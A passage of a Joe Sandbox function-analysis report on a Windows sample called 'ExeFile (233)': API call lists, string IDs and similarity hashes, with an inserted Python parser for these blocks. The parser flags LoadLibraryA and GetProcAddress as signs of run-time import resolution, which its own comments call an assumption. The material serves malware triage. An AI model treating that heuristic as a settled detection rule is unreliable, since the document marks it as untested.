                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: Window$AtomCallGlobalProcPropRect$DeleteFindH_prologLongRemove
                                                                  • String ID: AfxOldWndProc423
                                                                  • API String ID: 2397448395-1060338832
                                                                  • Opcode ID: 42f8192bdfa06c4a61062a92c3b8c52fd31b5a38a69e1511a4050e6997e842b7
                                                                  • Instruction ID: d0d5fd2a95d0caff163bc92c540bc67e825ba57d28d602554495161fd341ab14
                                                                  • Opcode Fuzzy Hash: 42f8192bdfa06c4a61062a92c3b8c52fd31b5a38a69e1511a4050e6997e842b7
                                                                  • Instruction Fuzzy Hash: D0319632A0012ABFDB11AFA5ED49DFF7F78EF09311F80052AF501A1161C7789912DBA9
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(COMCTL32.DLL,00008000,00000000,00000400,00421C6F,?,00040000), ref: 00421249
                                                                  • LoadLibraryA.KERNEL32(COMCTL32.DLL), ref: 00421252
                                                                  • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00421266
                                                                  • #17.COMCTL32 ref: 00421281
                                                                  • #17.COMCTL32 ref: 0042129D
                                                                  • FreeLibrary.KERNEL32(00000000), ref: 004212AA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: Library$AddressFreeHandleLoadModuleProc
                                                                  • String ID: COMCTL32.DLL$InitCommonControlsEx$`#vp,$v
                                                                  • API String ID: 1437655972-2158789292
                                                                  • Opcode ID: e4adc865601357d86bd5e694327d93582044c89adc3814df3ac42751e02ffd74
                                                                  • Instruction ID: 95cf30dd8ce34ee92b00f566a42e8099b381b461292cc38c6bf4f8d75c531509
                                                                  • Opcode Fuzzy Hash: e4adc865601357d86bd5e694327d93582044c89adc3814df3ac42751e02ffd74
                                                                  • Instruction Fuzzy Hash: 9BF0A936B00222DB97215F66BD4861BB6ECAFA476175504B6F805F3330CB78DC06467D
                                                                  APIs
                                                                  • lstrlenA.KERNEL32(?,00431060), ref: 0042B6FD
                                                                    • Part of subcall function 004059C0: MultiByteToWideChar.KERNEL32(?,00000000,?,000000FF,?,?), ref: 004059E2
                                                                  • SysAllocString.OLEAUT32(?), ref: 0042B729
                                                                  • lstrlenA.KERNEL32(?,00431060), ref: 0042B741
                                                                  • SysAllocString.OLEAUT32(00000000), ref: 0042B768
                                                                  • lstrlenA.KERNEL32(?,0000F108,?,00000100,004302DC,00431060), ref: 0042B7B6
                                                                  • SysAllocString.OLEAUT32(00000000), ref: 0042B7DF
                                                                  • lstrlenA.KERNEL32(?), ref: 0042B7FF
                                                                  • SysAllocString.OLEAUT32(00000000), ref: 0042B826
                                                                  • lstrlenA.KERNEL32(?), ref: 0042B84F
                                                                  • SysAllocString.OLEAUT32(00000000), ref: 0042B870
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: AllocStringlstrlen$ByteCharMultiWide
                                                                  • String ID:
                                                                  • API String ID: 2903237683-0
                                                                  • Opcode ID: c0277fd87a20140d2149f3f34d2eb646c926a0dbb09a78b738232d21ded5d3b9
                                                                  • Instruction ID: 1a3153decd58b46bd6a0c121a40f0f3a120ecd19db3a4f9c7d82dc57bbc87be9
                                                                  • Opcode Fuzzy Hash: c0277fd87a20140d2149f3f34d2eb646c926a0dbb09a78b738232d21ded5d3b9
                                                                  • Instruction Fuzzy Hash: 54510472A00219EBCB20AF75DC85B9ABBB8FF48354F50452BE915D7281DB38D850CFA4
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 0042097C
                                                                  • GetClassInfoA.USER32(?,?,?), ref: 00420997
                                                                  • RegisterClassA.USER32(?), ref: 004209AA
                                                                  • lstrlenA.KERNEL32(-00000034,00000001), ref: 004209E6
                                                                  • lstrlenA.KERNEL32(?), ref: 004209ED
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: Classlstrlen$H_prologInfoRegister
                                                                  • String ID:
                                                                  • API String ID: 3690589370-0
                                                                  • Opcode ID: 306c1d9e215d0fabf92add2f6d1187e6e5450e128d1fc0b5e055ba4f64e6dba0
                                                                  • Instruction ID: 71e2a2145aac47898e1f733674852a82c0eca1208d8ef585954345c2e418f862
                                                                  • Opcode Fuzzy Hash: 306c1d9e215d0fabf92add2f6d1187e6e5450e128d1fc0b5e055ba4f64e6dba0
                                                                  • Instruction Fuzzy Hash: E531B171A00229EFDF11DF60ED45AAEBFF4FF08315F504126E805A2251C738DA51CBA9
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: _strcat$___shr_12
                                                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN$?
                                                                  • API String ID: 1152255961-4131533671
                                                                  • Opcode ID: 1738a10b470dc6ab355d8796a0499abadeee2c3cf96b2aae57927fffe5d3a795
                                                                  • Instruction ID: f879c1e990ddeebbe466094dc5d8ff8bd54ad08b32661d6171e75fd2fa4a4eb8
                                                                  • Opcode Fuzzy Hash: 1738a10b470dc6ab355d8796a0499abadeee2c3cf96b2aae57927fffe5d3a795
                                                                  • Instruction Fuzzy Hash: 8C81367180528A8ECF11CBA8C9447FF7BB4AF15314F09455BD850EB282D37C9695C3AB
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 00420366
                                                                  • GetSystemMetrics.USER32(0000002A), ref: 0042042A
                                                                  • GlobalLock.KERNEL32(00000000,?,?,?,?), ref: 00420495
                                                                  • CreateDialogIndirectParamA.USER32(?,?,?,Function_0001FDFB,00000000), ref: 004204C4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: CreateDialogGlobalH_prologIndirectLockMetricsParamSystem
                                                                  • String ID: MS Shell Dlg
                                                                  • API String ID: 2364537584-76309092
                                                                  • Opcode ID: 9646e25077798d77b5deeb05f9c54692e781d64a2f7a8cb0eff1768c936a2d1f
                                                                  • Instruction ID: e5cb62502933813201733bd9fc32693ef396ee62b0366fab134f26ca96ffc902
                                                                  • Opcode Fuzzy Hash: 9646e25077798d77b5deeb05f9c54692e781d64a2f7a8cb0eff1768c936a2d1f
                                                                  • Instruction Fuzzy Hash: F551B431B00229DFCB14EFA5E8459EEBBF4AF44314F94456BF502E7292D7388981CB59
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: _strncpy$_strcspn
                                                                  • String ID: ,$,$.$_$_.,
                                                                  • API String ID: 209312476-1893563293
                                                                  • Opcode ID: 2e43a5f81b777912afccb140e69afc6829ec4401cf3e0a016be81a25e8608456
                                                                  • Instruction ID: 094b99d490e66d553d3a6f78acc3330e94534354dd0d36d43b286bc5cd0e5350
                                                                  • Opcode Fuzzy Hash: 2e43a5f81b777912afccb140e69afc6829ec4401cf3e0a016be81a25e8608456
                                                                  • Instruction Fuzzy Hash: 6F216B315C0A06EDEF308A64C881BEB3758AF913E4F584717F8498A281D33CA9C5C79D
                                                                  APIs
                                                                  • GetStockObject.GDI32(00000011), ref: 00425AB0
                                                                  • GetStockObject.GDI32(0000000D), ref: 00425AB8
                                                                  • GetObjectA.GDI32(00000000,0000003C,?), ref: 00425AC5
                                                                  • GetDC.USER32(00000000), ref: 00425AD4
                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00425AE8
                                                                  • MulDiv.KERNEL32(00000000,00000048,00000000), ref: 00425AF4
                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 00425AFF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: Object$Stock$CapsDeviceRelease
                                                                  • String ID: System
                                                                  • API String ID: 46613423-3470857405
                                                                  • Opcode ID: fe69864a35ea89a40515d5fc80cfd6c8ee3fb8849cac013ddd10af84c3ff34a8
                                                                  • Instruction ID: ffff926d86ea4a8282c210a474db753b18fb332d241bf638c921fd37c398010f
                                                                  • Opcode Fuzzy Hash: fe69864a35ea89a40515d5fc80cfd6c8ee3fb8849cac013ddd10af84c3ff34a8
                                                                  • Instruction Fuzzy Hash: 6B115471B00228EBEB20DFA1ED85FAE7B78AF04744F404125F605A71D0D7B49D42CBA8
                                                                  APIs
                                                                  • CompareStringW.KERNEL32(00000000,00000000,004322C4,00000001,004322C4,00000001,00433B18,00000040,00419FC8,?,00000001,?,00000000,?,00000000,?), ref: 0041ACE8
                                                                  • GetLastError.KERNEL32(?,0000003C,00000000,?,?,0000003C,00000000,?,?,00000018,00000000,?,?,0000016D,00000000,?), ref: 0041ACFA
                                                                  • GetCPInfo.KERNEL32(00000000,00000000,00433B18,00000040,00419FC8,?,00000001,?,00000000,?,00000000,?,^@,004176DC,00000000,00000000), ref: 0041ADA4
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000004,00000000,00000000,?,0000003C,00000000,?,?,0000003C,00000000,?,?,00000018), ref: 0041AE32
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000004,00000190,00000000,?,0000003C,00000000,?,?,0000003C,00000000,?,?,00000018), ref: 0041AEAB
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,?,00000000,00000000,?,0000003C,00000000,?,?,0000003C,00000000,?,?,00000018), ref: 0041AEC8
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,?,?,00000000,?,0000003C,00000000,?,?,0000003C,00000000,?,?,00000018), ref: 0041AF3E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWide$CompareErrorInfoLastString
                                                                  • String ID:
                                                                  • API String ID: 1773772771-0
                                                                  • Opcode ID: 5a6277f7f7645b34a1ca5d23e9bca92d5f01ef7ed54ed092bd0c7847a4edd101
                                                                  • Instruction ID: f5f744d86d54cd8ca6db1966468d69e19fe399d0adc8f6adef735f185170d353
                                                                  • Opcode Fuzzy Hash: 5a6277f7f7645b34a1ca5d23e9bca92d5f01ef7ed54ed092bd0c7847a4edd101
                                                                  • Instruction Fuzzy Hash: D0B1C471901209AFCF21DF65DC41AEF7BB6EF08354F14012BF811A62A0D73989E5CB9A
                                                                  APIs
                                                                  • __allrem.LIBCMT ref: 0040F614
                                                                  • __allrem.LIBCMT ref: 0040F62C
                                                                  • __allrem.LIBCMT ref: 0040F648
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0040F683
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0040F69F
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0040F6B6
                                                                    • Part of subcall function 004150CA: __lock.LIBCMT ref: 004150E2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@$__lock
                                                                  • String ID: ^@
                                                                  • API String ID: 4106114094-3067454934
                                                                  • Opcode ID: f69c0a922e78807a0b225c01b9b7e650e9e6c5e0ad57cf8c216420461cf175c5
                                                                  • Instruction ID: 0793e8c0385b27168c5ed49dc395ad643d610412e7e07f13e1331a588879ac93
                                                                  • Opcode Fuzzy Hash: f69c0a922e78807a0b225c01b9b7e650e9e6c5e0ad57cf8c216420461cf175c5
                                                                  • Instruction Fuzzy Hash: 54719F75E00209BFDB24DFA9CC81B9EB7B6EB84314F14817AF510F3691D3789A448B59
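The per-function blocks above (an "APIs" list of `Name.MODULE(args), ref: addr` bullets, then a "Similarity" block with the API ID, the `$`-joined String ID, the `API String ID` pair and the two fuzzy hashes) are the part of a Joe Sandbox report that is worth pivoting on in bulk: the same API String ID or opcode hash turning up in another sample's report is a cheap code-similarity signal, and the API list separates library boilerplate such as the MFC subclassing cleanup around `AfxOldWndProc423` from functions that resolve imports at run time. The following is an added example, not part of the Joe Sandbox report and not Joe Security's own tooling: a Python parser for these blocks, with a constructed sample made of two entries copied from this page. The `WATCH` set (treating direct `LoadLibraryA`/`LoadLibraryW`/`GetProcAddress` use as run-time import resolution) is an illustrative assumption, not the rule behind the report's own "dynamically determine API calls" signature.

```python
"""Parse Joe Sandbox per-function 'APIs' / 'Similarity' text blocks.

Added example, not part of the Joe Sandbox report or of Joe Security's
tooling. The line shapes (bullet, 'ref:' suffix, '$'-joined IDs, 'Part of
subcall function' prefix) come from this page; WATCH is an assumption.
"""
import re
from dataclasses import dataclass, field

# "<name>.<module>(<args>), ref: <hex>"; ordinals ("#17") and CRT helpers
# ("__EH_prolog") carry no argument list.
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<subfn>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[^.\s]+)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*?)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
KV_RE = re.compile(r"^•\s*(?P<key>[^:]+?):\s*(?P<val>.*)$")   # "key: value"
HEADERS = {"APIs", "Strings", "Memory Dump Source",
           "Joe Sandbox IDA Plugin", "Similarity"}
# Assumption for triage: direct use of these usually means the function
# resolves imports at run time rather than through the import table.
WATCH = {"LoadLibraryA", "LoadLibraryW", "GetProcAddress"}


@dataclass
class ApiCall:
    name: str
    module: str
    args: list
    ref: int                 # call-site address parsed from hex
    subcall_of: int = None   # callee address when Joe attributes it to a subcall


@dataclass
class FunctionEntry:
    apis: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)   # first value seen per key

    @property
    def api_string_id(self):
        """'API String ID: a-b' as (int, int); (0, 0) when absent."""
        a, b = self.fields.get("API String ID", "0-0").split("-", 1)
        return int(a), int(b)

    @property
    def strings(self):
        """Referenced strings; the report joins them with '$'."""
        return [s for s in self.fields.get("String ID", "").split("$") if s]


def parse_report(text):
    """One FunctionEntry per 'APIs' block; text before the first is skipped."""
    entries, current, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in HEADERS:
            section = line
            if line == "APIs":
                current = FunctionEntry()
                entries.append(current)
        elif current is None or not line:
            continue
        elif section == "APIs":
            m = API_RE.match(line)
            if m:
                current.apis.append(ApiCall(
                    m["name"], m["module"],
                    m["args"].split(",") if m["args"] else [],
                    int(m["ref"], 16),
                    int(m["subfn"], 16) if m["subfn"] else None))
        else:
            m = KV_RE.match(line)
            if m:
                current.fields.setdefault(m["key"].strip(), m["val"].strip())
    return entries


def watched_calls(entry, watch=WATCH):
    """Watched APIs the function calls itself (subcall attributions excluded)."""
    return sorted({c.name for c in entry.apis
                   if c.subcall_of is None and c.name in watch})


# Constructed sample: two entries copied from this report page.
SAMPLE = """\
APIs
• __EH_prolog.LIBCMT ref: 00422CFD
• GetPropA.USER32(?,AfxOldWndProc423), ref: 00422D15
• CallWindowProcA.USER32(?,?,00000110,?,00000000), ref: 00422D73
  • Part of subcall function 004222C8: GetWindowRect.USER32(?,004223EA), ref: 004222ED
• SetWindowLongA.USER32(?,000000FC,?), ref: 00422DA3
Strings
Similarity
• API ID: Window$AtomCallGlobalProcPropRect$DeleteFindH_prologLongRemove
• String ID: AfxOldWndProc423
• API String ID: 2397448395-1060338832
APIs
• GetModuleHandleA.KERNEL32(COMCTL32.DLL,00008000,00000000,00000400,00421C6F,?,00040000), ref: 00421249
• LoadLibraryA.KERNEL32(COMCTL32.DLL), ref: 00421252
• GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00421266
• #17.COMCTL32 ref: 00421281
• FreeLibrary.KERNEL32(00000000), ref: 004212AA
Similarity
• String ID: COMCTL32.DLL$InitCommonControlsEx$`#vp,$v
• API String ID: 1437655972-2158789292
"""

if __name__ == "__main__":
    for i, e in enumerate(parse_report(SAMPLE)):
        hits = watched_calls(e)
        if hits:
            print(f"entry {i} (API String ID {e.fields['API String ID']}): {hits}")
```

Calls that Joe attributes to a callee ("Part of subcall function ...") keep the callee address in `subcall_of` and are excluded from `watched_calls`, so a function is only flagged for its own `LoadLibraryA`/`GetProcAddress` use; on the sample this flags the COMCTL32 `InitCommonControlsEx` loader and not the window-subclassing cleanup. Feed the function-analysis section of a saved report (the plain-text export, as on this page) to `parse_report` and key a dict on `api_string_id` to compare against another sample's report.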
                                                                  APIs
                                                                    • Part of subcall function 004148BE: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00414930
                                                                  • __allrem.LIBCMT ref: 0040F8CC
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0040F8ED
                                                                  • __allrem.LIBCMT ref: 0040F909
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0040F92C
                                                                  • __allrem.LIBCMT ref: 0040F948
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0040F96B
                                                                    • Part of subcall function 00415116: __lock.LIBCMT ref: 00415124
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$__allrem$__lock
                                                                  • String ID: ^@
                                                                  • API String ID: 1282128132-3067454934
                                                                  • Opcode ID: 503f9c629e17bedf12aa749e16a2be0b44da8eaeb40d5e21e031042d8dcd9b81
                                                                  • Instruction ID: 6440d212c24c971b3252e86089126bc21e948c25b89904ef9f819ef4e6195108
                                                                  • Opcode Fuzzy Hash: 503f9c629e17bedf12aa749e16a2be0b44da8eaeb40d5e21e031042d8dcd9b81
                                                                  • Instruction Fuzzy Hash: 9C61B3B2900605EFDB24DF69C880AAEB7F5EB84314F24853FE455E3791D7349E898B48
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 00408DE6
                                                                    • Part of subcall function 0040780C: CoGetClassObject.OLE32(?,?,00000000,00433C4C,?), ref: 0040782C
                                                                    • Part of subcall function 00426B5A: __EH_prolog.LIBCMT ref: 00426B5F
                                                                    • Part of subcall function 00426B15: __EH_prolog.LIBCMT ref: 00426B1A
                                                                  • CreateILockBytesOnHGlobal.OLE32(00000000,00000001,?), ref: 00408F6F
                                                                  • StgCreateDocfileOnILockBytes.OLE32(?,00001012,00000000,?), ref: 00408F90
                                                                  • GlobalAlloc.KERNEL32(00000000,00000000), ref: 00408FE3
                                                                  • GlobalLock.KERNEL32(00000000), ref: 00408FF1
                                                                  • GlobalUnlock.KERNEL32(?), ref: 00409009
                                                                  • CreateILockBytesOnHGlobal.OLE32(?,00000001,?), ref: 0040902C
                                                                  • StgOpenStorageOnILockBytes.OLE32(?,00000000,00000012,00000000,00000000,?), ref: 00409048
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: GlobalLock$Bytes$CreateH_prolog$AllocClassDocfileObjectOpenStorageUnlock
                                                                  • String ID:
                                                                  • API String ID: 645133905-0
                                                                  • Opcode ID: 005b3a7b1ba1e7ec0c156c389e7c3750a11e397c02a4dfee90b0cb540f4121ed
                                                                  • Instruction ID: adf4c40781447d7e631396cda822757ebb0fe2e859268748525afa0d866fb1c1
                                                                  • Opcode Fuzzy Hash: 005b3a7b1ba1e7ec0c156c389e7c3750a11e397c02a4dfee90b0cb540f4121ed
                                                                  • Instruction Fuzzy Hash: D8C11A70A00209EFCF14DF65C9889AEBBBAFF88304B10456AF811EB291D779DD41CB65
                                                                  APIs
                                                                  • SetLastError.KERNEL32(0000007F), ref: 021F14DB
                                                                  • SetLastError.KERNEL32(0000007F), ref: 021F1507
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2113850461.00000000021F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021F1000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_21f1000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast
                                                                  • String ID:
                                                                  • API String ID: 1452528299-0
                                                                  • Opcode ID: f649229c1163f016b07f91870c78222a302cc32415b555731e65e4864fe24baf
                                                                  • Instruction ID: ae90ad17b81990faae996a2770a16cd596a6d8563d349f4f4af14a0506dee22f
                                                                  • Opcode Fuzzy Hash: f649229c1163f016b07f91870c78222a302cc32415b555731e65e4864fe24baf
                                                                  • Instruction Fuzzy Hash: E4712874E40109EFDB48DF94C590BAEB7B2FF48304F248599D62AAB351D774AA81CF90
                                                                  APIs
                                                                  • GetCPInfo.KERNEL32(00000000,?,00432B10,00000038,00415751,?,00000000,00000000,0040FE1B,00000000,00000000,004322F0,0000001C,0040FB4A,00000001,00000020), ref: 0041777B
                                                                  • GetCPInfo.KERNEL32(00000000,00000001), ref: 0041778E
                                                                  • _strlen.LIBCMT ref: 004177B2
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,0040FE1B,?,00000000,00000000), ref: 004177D3
                                                                  Memory Dump Source
